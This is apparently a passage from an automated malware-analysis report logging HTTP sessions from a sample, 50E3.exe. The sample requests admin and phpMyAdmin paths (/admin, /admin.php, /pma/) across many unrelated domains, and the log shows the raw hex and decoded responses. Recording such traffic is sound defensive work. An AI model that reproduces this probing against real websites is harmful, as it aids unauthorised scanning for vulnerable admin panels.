69 7a 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 0a 72 65 71 75 65 73 74 65 64 2e 20 20 45 69 74 68 65 72 20 79 6f 75 20 73 75 70 70 6c 69 65 64 20 74 68 65 20 77 72 6f 6e 67 0a 63 72 65 64 65 6e 74 69 61 6c 73 20 28 65 2e 67 2e 2c 20 62 61 64 20 70 61 73 73 77 6f 72 64 29 2c 20 6f 72 20 79 6f 75 72 0a 62 72 6f 77 73 65 72 20 64 6f 65 73 6e 27 74 20 75 6e 64 65 72 73 74 61 6e 64 20 68 6f 77 20 74 6f 20 73 75 70 70 6c 79 0a 74 68 65 20 63 72 65 64 65 6e 74 69 61 6c 73 20 72 65 71 75 69 72 65 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>401 Unauthorized</title></head><body><h1>Unauthorized</h1><p>This server could not verify that youare authorized to access the documentrequested. Either you supplied the wrongcredentials (e.g., bad password), or yourbrowser doesn't understand how to supplythe credentials required.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
239	192.168.2.4	56136	145.14.30.248	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.103746891 CET	216	OUT	GET /admin/ HTTP/1.1 Host: san.ee Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.315268993 CET	828	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 494 Last-Modified: Tue, 28 Nov 2023 01:18:59 GMT Connection: keep-alive Keep-Alive: timeout=20 ETag: "65654003-1ee" Cache-Control: no-cache Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 22 20 6e 61 6d 65 3d 22 68 74 74 70 22 20 76 61 6c 75 65 3d 22 35 30 30 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 35 30 30 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 6e 61 6d 65 3d 22 70 72 65 66 65 72 5f 68 74 74 70 73 22 20 76 61 6c 75 65 3d 22 74 72 75 65 22 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 72 6f 74 6f 63 6f 6c 3d 22 68 74 74 70 73 3a 22 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 70 6f 72 74 3d 35 30 30 31 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 55 52 4c 3d 70 72 6f 74 6f 63 6f 6c 2b 22 2f 2f 22 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 22 3a 22 2b 70 6f 72 74 2b 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 0a 20 20 20 20 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 55 52 4c 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <body> <input type="hidden" id="http" name="http" value="5000"> <input type="hidden" id="https" name="https" value="5001"> <input type="hidden" id="prefer_https" name="prefer_https" value="true"> </body> <script type="text/javascript"> var protocol="https:"; var port=5001; var URL=protocol+"//"+location.hostname+":"+port+location.pathname+location.search; location.replace(URL); </script></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
240	192.168.2.4	56041	194.63.248.47	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.105525970 CET	220	OUT	GET /admin.php HTTP/1.1 Host: z-a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.307585955 CET	530	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:46 GMT Server: Apache/2.4.25 (Debian) Location: https://z-a.com/admin.php Content-Length: 282 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 2d 61 2e 63 6f 6d 2f 61 64 6d 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 7a 2d 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://z-a.com/admin.php">here</a>.</p><hr><address>Apache/2.4.25 (Debian) Server at z-a.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
241	192.168.2.4	56790	213.171.212.244	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.140645981 CET	219	OUT	GET /admin.php HTTP/1.1 Host: gco.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.320261002 CET	440	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.18.0 (Ubuntu) Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 178 Connection: keep-alive Location: https://gco.uk/admin.php Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
242	192.168.2.4	56796	68.183.34.12	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.144588947 CET	222	OUT	GET /admin.php HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.321727991 CET	233	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:46 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://hul.co.uk/ Content-Length: 0 Content-Type: text/html; charset=UTF-8
Nov 30, 2023 11:22:46.327985048 CET	213	OUT	GET / HTTP/1.1 Host: hul.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.508950949 CET	1340	IN	HTTP/1.1 302 Found Date: Thu, 30 Nov 2023 10:22:46 GMT Server: Apache/2.4.57 (Ubuntu) Location: http://www.hul.co.uk Expires: Thu, 19 Nov 1981 08:52:00 GMT Last-Modified: Thu, 30 Nov 2023 10:22:46 +0000 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=28r2p1jbl64kdbbtg4br6drue2; path=/ Content-Length: 4111 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 20 79 73 6d 2f 20 2d 2d 3e 0a 3c 21 2d 2d 20 68 75 6c 2e 63 6f 2e 75 6b 20 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 20 74 6f 20 48 55 4c 2e 63 6f 2e 75 6b 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 69 6d 61 67 65 74 6f 6f 6c 62 61 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 22 20 2f 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2f 62 61 73 65 2e 63 73 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 68 75 6c 2e 63 6f 2e 75 6b 20 7c 20 53 65 61 72 63 68 20 66 6f 72 20 65 76 65 72 79 74 68 69 6e 67 20 68 75 6c 20 72 65 6c 61 74 65 64 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 2d 31 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 3c 21 2d 2d 0a 09 09 66 75 6e 63 74 69 6f 6e 20 61 64 64 5f 73 65 61 72 63 68 5f 74 72 65 6e 64 73 28 6b 65 79 77 6f 72 64 73 29 0a 09 09 7b 09 0a 09 09 09 76 61 72 20 77 69 64 74 68 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6d 61 69 6e 5f 63 6f 6e 74 65 6e 74 27 29 2e 6f 66 66 73 65 74 57 69 64 74 68 3b 0a 09 09 09 76 61 72 20 74 72 65 6e 64 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 61 72 63 68 5f 74 72 65 6e 64 73 5f 66 72 61 6d 65 27 29 3b 0a 09 09 09 76 61 72 20 73 63 72 69 70 74 5f 73 72 63 20 3d 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 74 72 65 6e 64 73 2f 66 65 74 63 68 43 6f 6d 70 6f 6e 65 6e 74 3f 68 6c 5c 37 35 65 6e Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html>... ysm/ -->... hul.co.uk --><head><title>Welcome to HUL.co.uk</title><meta http-equiv="imagetoolbar" content="no" /><link rel="stylesheet" type="text/css" href="styles/base.css" /><meta name="description" lang="en" content="hul.co.uk \| Search for everything hul related" /><meta http-equiv="Pragma" content="no-cache" /><meta http-equiv="Expires" content="-1" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><script type="text/javascript">...function add_search_trends(keywords){var width = document.getElementById('main_content').offsetWidth;var trends = document.getElementById('search_trends_frame');var script_src = "http://www.google.com/trends/fetchComponent?hl\75en
Nov 30, 2023 11:22:46.508985043 CET	1340	IN	Data Raw: 2d 47 42 5c 34 36 71 5c 37 35 22 2b 6b 65 79 77 6f 72 64 73 2b 22 5c 34 36 67 65 6f 5c 37 35 47 42 5c 34 36 63 6d 70 74 5c 37 35 71 5c 34 36 63 6f 6e 74 65 6e 74 5c 30 37 35 31 5c 34 36 63 69 64 5c 37 35 54 49 4d 45 53 45 52 49 45 53 5f 47 52 41 Data Ascii: -GB\46q\75"+keywords+"\46geo\75GB\46cmpt\75q\46content\0751\46cid\75TIMESERIES_GRAPH_0\46export\0755\46w\075"+width+"\46h\075360";trends.setAttribute('src', script_src);trends.setAttribute('width',width);return false;}--></
Nov 30, 2023 11:22:46.508991957 CET	1340	IN	Data Raw: 65 20 66 6f 72 20 73 61 6c 65 20 6f 72 20 6c 65 61 73 65 3c 2f 61 3e 3c 2f 68 32 3e 0a 09 09 09 09 09 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 69 6e 74 65 72 65 73 74 65 64 20 69 6e 20 48 55 4c 2e 63 6f 2e 75 6b 2c 20 70 6c 65 61 73 65 20 63 6c Data Ascii: e for sale or lease</a></h2><p>If you are interested in HUL.co.uk, please click <a href="/buy-this-domain.php">here</a> to find out more</p></div><div style="clear: both;"></div><div style="clear: both;"></div>
Nov 30, 2023 11:22:46.509010077 CET	735	IN	Data Raw: 3d 22 73 75 62 6d 69 74 22 20 76 61 6c 75 65 3d 22 53 75 62 6d 69 74 20 26 72 61 71 75 6f 3b 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 09 09 0a 09 3c 2f Data Ascii: ="submit" value="Submit »"></div></div><div class="clear"></div></fieldset></form></div><br/></div> ... notice-beige --></div> ... content --></div> ... bd --><div class="clear"></div><di

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
243	192.168.2.4	57131	15.197.142.173	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.232105017 CET	222	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.335479975 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-123-133.ec2.internal X-Request-Id: 79c72562-eed5-40ff-8da2-4c0f807e05f8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
244	192.168.2.4	57477	54.209.32.212	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.288817883 CET	224	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: bjail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.387573004 CET	202	IN	HTTP/1.1 302 Found content-length: 0 date: Thu, 30 Nov 2023 10:22:46 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=bjail.com

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
245	192.168.2.4	57620	13.248.169.48	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.416321039 CET	217	OUT	GET /admin HTTP/1.1 Host: 6ail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.577402115 CET	875	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://6ail.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_Crn8+XH/7BjOKK31y9VppMLlrvQ9iIkf6iP+YiITDtxldJJdU62fsCBRew9dSzvN9GZwnjV7G6N+mX4RhlH0YA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.116.80.36;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
246	192.168.2.4	58287	15.197.142.173	80

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.791003942 CET	215	OUT	GET /pma/ HTTP/1.1 Host: a6a.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.893047094 CET	419	IN	HTTP/1.1 404 Not Found Date: Thu, 30 Nov 2023 10:22:46 GMT Content-Type: text/html; charset=utf-8 Content-Length: 125 Connection: keep-alive Server: ip-10-123-122-242.ec2.internal X-Request-Id: 504cb851-273f-4736-a38b-987de846f16f Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title> Not Found </title></head><body>HTTP Status: 404 (not found)</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
247	192.168.2.4	58293	15.197.204.56	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.804663897 CET	216	OUT	GET /admin HTTP/1.1 Host: 96l.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:47.175246000 CET	876	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V4cJSujL/MY6FiD6HoU1A338AW8ZvUCt9A0Fdc+GzMDfeJLpqPvByRAmfiYmWS9aVV3qaHZRJzqLxncwjIz7+w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.119.144.201;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>
Nov 30, 2023 11:22:47.379374027 CET	876	IN	HTTP/1.1 302 Moved Temporarily Server: openresty Date: Thu, 30 Nov 2023 10:22:47 GMT Content-Type: text/html Content-Length: 142 Connection: keep-alive Location: https://96l.com/admin X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_V4cJSujL/MY6FiD6HoU1A338AW8ZvUCt9A0Fdc+GzMDfeJLpqPvByRAmfiYmWS9aVV3qaHZRJzqLxncwjIz7+w Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=10.119.144.201;Path=/;Max-Age=86400; Set-Cookie: country=;Path=/;Max-Age=86400; Set-Cookie: city="";Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
248	192.168.2.4	58301	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.818332911 CET	219	OUT	GET /admin HTTP/1.1 Host: onlist.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Nov 30, 2023 11:22:46.932362080 CET	569	IN	HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: http://ww42.onlist.com Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.2 X-AspNet-Version: 4.0.30319 Set-Cookie: _dhc.139992723=34f686db-1af1-4f59-8b8c-ff027afc9016; path=/ X-Powered-By: ASP.NET Date: Thu, 30 Nov 2023 10:20:19 GMT Connection: close Content-Length: 139 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 34 32 2e 6f 6e 6c 69 73 74 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://ww42.onlist.com">here</a>.</h2></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
249	192.168.2.4	58299	192.99.158.243	80	5000	C:\Users\user\AppData\Local\Temp\50E3.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2023 11:22:46.818510056 CET	221	OUT	GET /admin HTTP/1.1 Host: gr.2mail.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
